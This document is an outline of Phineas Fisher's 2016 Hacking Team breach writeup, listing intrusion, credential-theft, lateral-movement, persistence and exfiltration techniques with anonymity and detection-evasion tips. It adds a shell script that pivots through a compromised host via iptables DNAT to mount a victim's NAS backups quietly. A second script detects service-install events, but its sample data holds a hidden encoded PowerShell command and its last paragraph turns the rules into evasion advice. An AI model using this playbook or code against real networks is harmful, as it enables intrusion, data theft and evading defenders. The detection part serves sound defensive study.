Hacking Team Writeup
by Phineas Fisher (2016)
| Remark |
|---|
| #antisec |
| Phineas is disgusted by “sellouts” |
| Hacking Team |
| Tor isn’t a panacea |
| OPSEC considerations |
| Whonix, Tails, Qubes TorVM |
| wifislax - wifi cracking distro |
| VPN |
| Jeremy Hammond busted by correlating home address w/ VPN |
| don't hack directly from Tor exit nodes: they are widely blacklisted and logged |
| DNS tunneling |
| command and control |
| connect-back shells |
| stable servers |
| hacked servers |
| pay for VPS with Bitcoin |
| attribution |
| APT |
| code and TTP reuse as attribution |
| public tools as plausible deniability |
| changing tactics to avoid being profiled |
| “Google Hacking for Penetration Testers” |
| subdomain enumeration |
| fierce |
| theHarvester |
| recon-ng |
| whois + reverse whois |
| site:domaintools.com |
| site:www.find-ip-address.com |
| port scanning |
| service fingerprinting |
| IDS |
| “the whole internet is being scanned constantly” |
| nmap |
| zmap |
| masscan |
| WhatWeb |
| BlindElephant |
| social engineering |
| data.com (formerly Jigsaw) for employee names and titles |
| file metadata |
| metagoofil |
| FOCA (metadata) |
| foothold |
| try easy, common techniques first |
| spear phishing |
| targeted attacks |
| buying access |
| Joomla |
| Joomscan |
| VPN appliances |
| 0-day |
| postfix |
| reverse engineering |
| leveraging bugs in embedded devices |
| backdoored firmware |
| post exploitation |
| backdoor |
| busybox |
| Responder.py |
| Python |
| tcpdump |
| dsniff |
| socat |
| GNU screen |
| SOCKS proxy |
| tgcd |
| testing tools and attack kits prior to use |
| Responder.py -A |
| NoSQL |
| MySQL authentication bypass |
| mongodb |
| RCS |
| GridFS |
| torrent |
| Shodan |
| insecure backups |
| iSCSI |
| Synology |
| NAS |
| port forwarding |
| iscsiadm |
| iptables |
| vmfs-fuse |
| losetup |
| fdisk |
| mount |
| VHD |
| pwdump |
| cachedump |
| lsadump |
| registry hives |
| proxychains |
| smbclient |
| Metasploit |
| psexec.ps1 |
| meterpreter |
| process migration |
| “load kiwi” |
| “creds_wdigest” |
| Domain Admin |
| PowerShell |
| New-MailboxExportRequest |
| Microsoft Exchange |
| lateral movement |
| mimikatz |
| sekurlsa::logonpasswords |
| sekurlsa::msv |
| runas |
| PowerUp |
| bypassuac |
| privilege escalation |
| psexec |
| WMI |
| winexe |
| PowerShell Empire invoke-psexec |
| sc.exe |
| pth-winexe |
| Event ID 7045 “Service Control Manager” |
| Event Logs |
| wmiexec.py |
| pth-wmis |
| pass the hash |
| wmic |
| PSRemoting |
| don't enable protocols (e.g. PSRemoting) that aren't already in use; stick to what the environment already runs |
| Windows 10 |
| Scheduled Task |
| schtasks.exe |
| GPO |
| GPO logon script |
| GPO install msi |
| GPO scheduled task |
| token stealing - mimikatz token::xxx |
| MS14-068 |
| Kerberos |
| Domain Admin Tickets |
| sekurlsa::pth |
| process injection |
| RAT |
| pupy: migrate command |
| pupy |
| meterpreter: migrate |
| Empire: psinject |
| persistence |
| Duqu 2-style persistence |
| high uptime servers as targets |
| golden ticket |
| backup access |
| PowerView |
| Windows 2000, 2003 lacking PowerShell |
| netview.exe |
| net view |
| Invoke-ShareFinderThreaded |
| Select-String |
| Out-File |
| reading email |
| reading SharePoint |
| Active Directory |
| Nagios |
| Get-Keystrokes |
| Get-TimedScreenshot |
| PowerSploit |
| Do-Exfiltration |
| nishang |
| hunting sysadmins |
| CredMan.ps1 |
| searching for interesting files |
| TrueCrypt volumes |
| weak passwords |
| passwords.txt |
| git repos |
| sudo |
| password reuse |
| GitLab |
| “forgot my password” + mailserver access |
| ethical hacking |
| encrypted email - GPG/PGP |
| Enigmail |
| Links |
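The backup rows above (iSCSI, Synology NAS, port forwarding, iscsiadm, iptables, vmfs-fuse, losetup, fdisk, mount, VHD) are the steps of one procedure: reach a NAS-exported LUN through a pivot, expose the VMware datastore on it, and mount a Windows partition from a backup image. The script below is an added example, not code from the writeup or from Phineas Fisher. Pivot and NAS addresses, the IQN and all paths are hypothetical; only `part_offset` is exercised offline, on a constructed `fdisk -l` listing. The note about fixed-size VHDs (raw image plus a 512-byte footer) is a fact about the format, not something the writeup states.

```shell
#!/bin/sh
# Added example (not from the writeup): attaching a NAS-hosted backup over iSCSI through
# a pivot and mounting a Windows partition from it read-only. Addresses, IQN and paths
# are hypothetical; only part_offset runs offline, on the constructed fdisk listing below.

# Step 1: iSCSI through a plain TCP forward. The pivot (a hacked Linux box that can reach
# the NAS) DNATs tcp/3260 to the NAS; the attacker box then logs in as if the pivot were
# the NAS. Run on the pivot (192.0.2.66 is the hypothetical NAS):
#   sysctl -w net.ipv4.ip_forward=1
#   iptables -t nat -A PREROUTING -p tcp --dport 3260 -j DNAT --to-destination 192.0.2.66:3260
#   iptables -t nat -A POSTROUTING -j MASQUERADE
attach_iscsi() {  # attach_iscsi PIVOT_IP IQN
    iscsiadm -m discovery -t sendtargets -p "$1:3260"
    iscsiadm -m node -T "$2" -p "$1:3260" --login   # the LUN appears as a new /dev/sdX
}

# Step 2: the LUN holds a VMFS datastore with VMDKs. vmfs-fuse exposes it; the flat VMDK
# is then bound to a read-only loop device. A fixed-size VHD is a raw image plus a
# 512-byte footer, so the same losetup/fdisk/mount steps apply to it unchanged.
expose_image() {  # expose_image VMFS_PARTITION IMAGE_PATH -> prints the loop device
    mkdir -p /mnt/vmfs
    vmfs-fuse "$1" /mnt/vmfs
    losetup -r -f --show "$2"
}

# Step 3: fdisk reports partition starts in sectors; mount -o offset= wants bytes.
# part_offset FDISK_OUTPUT PARTITION_DEVICE -> start sector * sector size (empty if absent)
part_offset() {
    printf '%s\n' "$1" | awk -v dev="$2" '
        /^Units: sectors of/ { for (i = 1; i <= NF; i++) if ($i == "=") ss = $(i + 1) }
        $1 == dev { start = ($2 == "*") ? $3 : $2; printf "%d\n", start * (ss ? ss : 512); exit }'
}

mount_partition() {  # mount_partition LOOP_DEVICE N  (fdisk names loop partitions loopXpN)
    off=$(part_offset "$(fdisk -l "$1")" "${1}p${2}")
    [ -n "$off" ] || { echo "no partition $2 on $1" >&2; return 1; }
    mkdir -p /mnt/win
    mount -o ro,loop,offset="$off" "$1" /mnt/win   # ro: never write to a backup you are reading
}

# Constructed `fdisk -l /dev/loop0` listing of a 60 GiB Windows disk (two NTFS partitions).
SAMPLE_FDISK='Disk /dev/loop0: 60 GiB, 64424509440 bytes, 125829120 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x1a2b3c4d

Device       Boot   Start       End   Sectors  Size Id Type
/dev/loop0p1 *       2048    718847    716800  350M  7 HPFS/NTFS/exFAT
/dev/loop0p2       718848 125827071 125108224 59.7G  7 HPFS/NTFS/exFAT'

echo "offset of /dev/loop0p2: $(part_offset "$SAMPLE_FDISK" /dev/loop0p2) bytes"   # 368050176
```

The boot-flag column shifts the start sector one field to the right, which is why `part_offset` checks for `*` before reading it; the offset for the data partition is 718848 sectors times 512 bytes. Everything is mounted read-only so the backup is not altered, which matters both for not tripping integrity monitoring and for keeping the copy forensically clean.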
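The psexec/winexe/sc.exe rows above share one artifact the page calls out: each installs a service, which the System log records as Event ID 7045 from the Service Control Manager. The script below is an added example of triaging such records, not code from the writeup. It assumes the events have already been exported to a `|`-separated file (time, host, service name, image path, account), for instance from a SIEM or from `wevtutil qe System /q:"*[System[EventID=7045]]" /f:text` reshaped into that layout; the five records, hostnames and service names are constructed.

```shell
#!/bin/sh
# Added example (not from the writeup): triaging Event ID 7045 ("A service was installed",
# System log, Service Control Manager) records for service-based lateral movement.
# Input is '|'-separated: time|host|service name|image path|account. Records are constructed.

SAMPLE_7045='2016-07-01T02:13:44Z|HT-WS07|WinDefend|"%ProgramFiles%\Windows Defender\MsMpEng.exe"|LocalSystem
2016-07-01T02:14:09Z|HT-FILE01|PSEXESVC|%SystemRoot%\PSEXESVC.exe|LocalSystem
2016-07-01T02:15:51Z|HT-EXCH01|yLmfWhqT|%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand SQBFAFgA...|LocalSystem
2016-07-01T02:16:02Z|HT-DB01|hQWtPvxN|\\HT-DB01\ADMIN$\hQWtPvxN.exe|LocalSystem
2016-07-01T03:00:00Z|HT-WS07|Spooler|%SystemRoot%\System32\spoolsv.exe|LocalSystem'

# flag_7045: reads records on stdin, prints one line per suspicious service with the
# first matching reason. Rules, in order:
#   1. binary served from a UNC path / ADMIN$          -> psexec-style copy-and-run
#   2. a shell or PowerShell is the service binary      -> Empire/Metasploit psexec
#   3. PSEXESVC                                         -> Sysinternals PsExec
#   4. 8-letter name outside System32/Program Files     -> tool-generated random name
flag_7045() {
    awk -F'|' '
    {
        name = $3; path = $4; lpath = tolower(path); reason = ""
        if (path ~ /ADMIN\$/ || path ~ /^\\\\/)
            reason = "binary in ADMIN$/UNC path"
        else if (lpath ~ /powershell|comspec|cmd\.exe/)
            reason = "shell as service binary"
        else if (toupper(name) == "PSEXESVC")
            reason = "sysinternals psexec service"
        else if (length(name) == 8 && name ~ /^[A-Za-z]+$/ && lpath !~ /system32|program/)
            reason = "random 8-letter service name"
        if (reason != "")
            printf "%s %s svc=%s reason=%s\n", $1, $2, name, reason
    }'
}

count_flagged() {  # number of suspicious records in SAMPLE_7045
    printf '%s\n' "$SAMPLE_7045" | flag_7045 | awk 'END { print NR }'
}

printf '%s\n' "$SAMPLE_7045" | flag_7045
```

On the sample the two legitimate services (WinDefend, Spooler) pass and the three tool-installed ones are flagged. Rule 4 is the noisy one, since some vendors also ship short alphabetic service names; it is a lead to pivot on the source host and time window, not a verdict on its own. The same ordering of rules explains the page's advice to prefer sc.exe, WMI or scheduled tasks with unremarkable names over stock psexec: the artifact is the service install itself, so what the defender sees is the name and image path you chose.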